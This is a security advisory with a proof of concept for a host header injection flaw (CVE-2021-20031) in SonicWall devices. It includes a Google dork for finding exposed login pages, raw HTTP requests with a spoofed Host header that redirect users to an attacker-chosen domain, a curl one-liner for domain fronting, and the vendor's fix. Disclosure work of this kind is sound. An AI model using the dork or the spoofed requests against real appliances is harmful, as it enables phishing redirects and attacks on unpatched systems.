Sonicwall SonicOS 7.0 Host Header Injection

2021.10.13
Credit: Ramikan
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2021-20031
CWE: CWE-601
Dork: inurl:"auth.html" intitle:"SonicWall"


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection # Google Dork: inurl:"auth.html" intitle:"SonicWall" # intitle:"SonicWall Analyzer Login" # Discovered Date: 03/09/2020 # Reported Date: 07/09/2020 # Exploit Author: Ramikan # Vendor Homepage:sonicwall.com # Affected Devices: All SonicWall Next Gen 6 Devices # Tested On: SonicWall NAS 6.2.5 # Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3 # Fixed Version:Gen6 firmware 6.5.4.8-89n # CVE : CVE-2021-20031 # CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) # Category:Hardware, Web Apps # Reference : https://github.com/Ramikan/Vulnerabilities/ ************************************************************************************************************************************* Vulnerability 1: Host Header Injection ************************************************************************************************************************************* Description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack Impact: Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the HTTP response, below are the two lines. var jumpURL = "https://fakedomain.com/auth.html"; ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> ************************************************************************************************************************************* Normal Request ************************************************************************************************************************************* GET / HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ************************************************************************************************************************************* Normal Response ************************************************************************************************************************************* HTTP/1.0 200 OK Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html; charset=UTF-8; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> ++++++++++++++++++snipped+++++++++++++++++++++++ </head> <body class="login_bg"> <div class="login_outer"> <div class="login_inner"> <div class="vgap48"></div> <div class="login_logo"> <img src="logo_sw.png"> </div> <div class="login_prodname"> Network Security Appliance </div> <div class="vgap48"></div> <div class="login_msg_header"> Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a> </div> <div class="vgap24"></div> </div> </div> </body> </html> ************************************************************************************************************************************* POC ************************************************************************************************************************************* Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the response, below are the two lines. var jumpURL = "https://fakedomain.com/auth.html"; ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> ************************************************************************************************************************************* Request: ************************************************************************************************************************************* GET / HTTP/1.1 Host: fakedomain.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Upgrade-Insecure-Requests: 1 Connection: close Cookie: temp= ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.0 200 OK Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html; charset=UTF-8; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Type" content="text/html"> <title>Document Moved</title> <meta name="id" content="docJump" > <link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css"> <link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css"> <script type="text/JavaScript"> var resetSecureFlag = false; setTimeout("goJump();", 1000); function goJump() { var jumpURL = "https://fakedomain.com/auth.html"; var jumpProt = jumpURL.substr(0,6).toLowerCase(); var ix; if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) { jumpProt = jumpProt.substr(0,ix+1); if (location.protocol.toLowerCase() != jumpProt) { window.opener = null; top.opener = null; } } if (resetSecureFlag) { var sessId = getCookie("SessId"); var pageSeed = swlStore.get("PageSeed", {isGlobal: true}); if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); } if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); } } top.location.href = jumpURL; } function setCookie(key, value) { var argv = setCookie.arguments; var argc = setCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = key + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } function getCookie(key) { if (document.cookie.length) { var cookies = ' ' + document.cookie; var start = cookies.indexOf(' ' + key + '='); if (start == -1) { return null; } var end = cookies.indexOf(";", start); if (end == -1) { end = cookies.length; } end -= start; var cookie = cookies.substr(start,end); return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1)); } else { return null; } } </script> </head> <body class="login_bg"> <div class="login_outer"> <div class="login_inner"> <div class="vgap48"></div> <div class="login_logo"> <img src="logo_sw.png"> </div> <div class="login_prodname"> Network Security Appliance </div> <div class="vgap48"></div> <div class="login_msg_header"> Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> </div> <div class="vgap24"></div> </div> </div> </body> </html> The redirection is happening to https://fakedomain.com/auth.html. ************************************************************************************************************************************* Attack Vector: ************************************************************************************************************************************* Can be used for domain fronting. curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device" ************************************************************************************************************************************* Vendor Response: ************************************************************************************************************************************* Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) - fix is provided with a CLI option > configure > administration > enforce-http-host-check, to avoid Host header redirection. Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 *************************************************************************************************************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top